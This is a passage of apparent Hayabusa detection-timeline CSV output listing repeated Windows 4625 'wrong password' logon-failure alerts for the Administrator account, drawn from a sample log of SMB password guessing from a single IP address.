NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaSNgw2hvkxLnQF8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FSYOWptgxHYTDv1x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Van1qwuRoWYPWrIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyLCa9OHocazZKQ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxrR5iUsTI9LVnLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxMREacN0QfvL51B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fbzSHaZBDH4zFZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NgIei0bMIcslJCVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JPoKjwanczELBC5A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOYMVAnCWB2RFYAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1S45GBtQ8Uoyilw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60oeDAnU41sz1wYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enjlrrdf6lrm7Bao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58WzO6wxh7QshZgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eZKzHgu5ADLYsWU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uOSK3xC1E5PpBVNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vFXasYWGCHbQOWWI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XlYJ3oHYKYhg0KC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LxOKwi8Q4y2mHBDu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwFKFySH4w2yWtPX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlwGTGadOEMfUFiM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hZ9WuMoOtxGdwOQn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cCLK0gWvRoz0Ceao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDrcOxtm2fHXK5pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm2tPGetcAJkSuvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FBskiUSfF2ghuDcF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZJal2nq3JAk6I2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9ek0Sl1ikhIfIb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eHrn5Tp9JtnAgCbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7tR8gp2piqqixqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SqSBRMoiFeWe4FAt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nu4m1xKDU0OUkoR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gui98cdQHPgyNOZI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bm4U7TAfsPTEiygC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fDOoaVWVFAMLiA71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qiJeLgInEkHffefo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWyguWQP2iYUArhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vDa3GqsTMMXguFhi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lr0lkAcdnji1zjW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4WfNFd5MkQxaxHGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8hdPhtxP4Ds65yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2BBoWoXWXuRysTx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6GEhZ2BduHwjJj9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GbwEHQCAUJd64LlA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wGfoObbN8ioefyce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iLHhCgHvmOzoLLqG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9KL69y47DMyFOWT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ECuVYiqdMw2dMjT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YJCYumRekD7AREYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0H4OxKzoemZrsosT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSHnvxa0khWdWBVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bJkPp0bghDCPYz52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfHRWGXjCej9HSPb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X42H7EvrvzsRqXWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moo42NdOq30Gnz3T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4NHVYxxDkCOsQw8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iPUiW0vFQB405kwS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OtcZ4ymkeLHeU7YJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxZCDKWtqkGJ0dnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f4GGnhttZgmRPRJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gI0j9w45eXEFeex3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BVZ2YRDUAOsNgKxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJfIpxlcwVf7pWga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Oerixd9ODF6fslsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJC5yvrIymYgaHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4schZcUP8Im8Ee1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WotargyGlEq9PBch : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2JSMrPoucOR0nzlD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jr4w4uoF2DVZ5n9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v319oZIaOBpuf542 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GNRTL9BLlGWMx6dA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHlDIOZ9B5uY8Rzz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dr2bvAue8mr5kagX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXBds9GoXr6IZUfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLYuegjXO18lo342 : IP Address: 192.168.198.149 : AuthPackage: 